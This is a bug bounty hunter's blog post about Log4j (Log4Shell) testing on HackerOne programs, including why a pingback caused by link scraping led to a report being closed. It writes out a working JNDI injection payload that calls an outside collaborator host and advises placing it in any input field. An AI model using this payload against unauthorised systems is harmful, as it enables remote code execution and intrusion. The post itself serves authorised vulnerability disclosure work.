Facts to clear about Log4J for “Bug Bounty Hunters”
Hello everyone,
In my 1st Blog, I’ve mentioned that I’ll post a blog about my each and every finding. I also got DMs that asked for Details/methods of my recent P1 findings. As I am in the final year of my undergrad and I am doing full-time bug bounty hunting, learning some new concepts, that’s why I failed to deliver blog posts timely. Sorry for that :)
From next year January will start uploading all blogs. But this blog is very Imp for the current situation.
Let's start….
2 days ago I shared a screenshot of my Log4j Hackerone report. After that, I received lots of DM on Instagram asking for some help, guidance about Log4j.
I want to clear some Doubts and misunderstandings about this bug.
3 reports submitted on Hackerone programs:
- 1st report: Not Applicable but bounty awarded for helping them to troubleshoot
- 2nd Report: Valid and Bounty Awarded (the same program as 1st report)
- 3rd Report: Tiraged (Different Program)
In this blog, we are gonna talk about only on “1st Report”
As you all know that the Log4j is the latest vulnerability and There are very few resources available about finding log4j on Websites. You can find Log4j anywhere In name fields, UA string, Support form..literally any input field on site.
Let me clear one thing: If you're getting pingback from the company’s IP address (not from google or AWS) then report it, You don’t need to perform Full RCE. (As per my experience till now on HackerOne)
The site has a feature of creating your own channel and you can add members there, can post information, questions, etc. So I submitted the Log4j payload including my burp collaborator link for pingback requests as a question in my channel.
Payload: ${jndi:ldap://p1ry70m3caxtxo2qlpl4l6smgdm3as.burpcollaborator.net/a}
And BOOM!! for me, Not for company :)
Got HTTP pingback from the company’s IP.
Submitted the report.
Then the company asked me for UA string.
Then I submitted the UA string i.e.,
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Again company asked me for POC Video.
After that company asked me to retest and capture the video because they implemented some kind of algorithm or feature to trace such kind of activity.
I submitted the video POC and after one day of waiting, they came to the conclusion to close this report as NA and awarded me for helping them to troubleshoot.
After reading this there were a lot of questions in my mind that If this is not Log4j then how is this payload triggered. I was like:
Then I asked them about this, after some time another developer came and he replied:
What a Noob I Am :)
It was triggered because of the link scraping function.
Then I used the Canary Log4shell token to test again, and this time I got a pingback from AWS Host.
Remember: Only report when you’re getting pingback from the company’s IP address. If you report pingback from Google or AWS they’ll close it as a NA, there are very few chances that your (AWS/Google pingback) report will get accepted as a valid issue.
So what about this pingback from Google/AWS? Don't worry I got this.
One of my LinkedIn connection Sanyam Kakkar told me about this:
“I also got in the same situation when I was working on a different situation but concluded that the issue was in the 3rd party API which actually belongs to google that's why ping request comes from google,
then I send the report to google and they responded:The payload you demonstrate in the report would indeed have been triggered by Log4Shell, but it also contains a hostname written literally. Our systems often scan for hostnames and URLs in various user inputs (e.g. chat messages, emails), resolve them via DNS, and try to fetch the URLs, for example, to determine if the payload is malicious, or whether the message itself should be classified as spam. We think this is what happened here. Its google indeed behavior to ping the domain if they find it anywhere in their products.”
The (HackerOne program) company’s security staff was very good. As this was my 1st Log4j report, I learned a lot of new things from my mistakes, it helped me, and successfully submitted 2 valid Log4j reports.
All the information in this blog is as per my experience and mistakes. My humble request to all the readers and bug hunters if you have any corrections or additional information please feel free to comment or DM me I’ll add or make the changes in a blog.
Feel Free to connect: Linkedin Twitter
(PS: Please don't ask about bounty amount n all these things in DM)
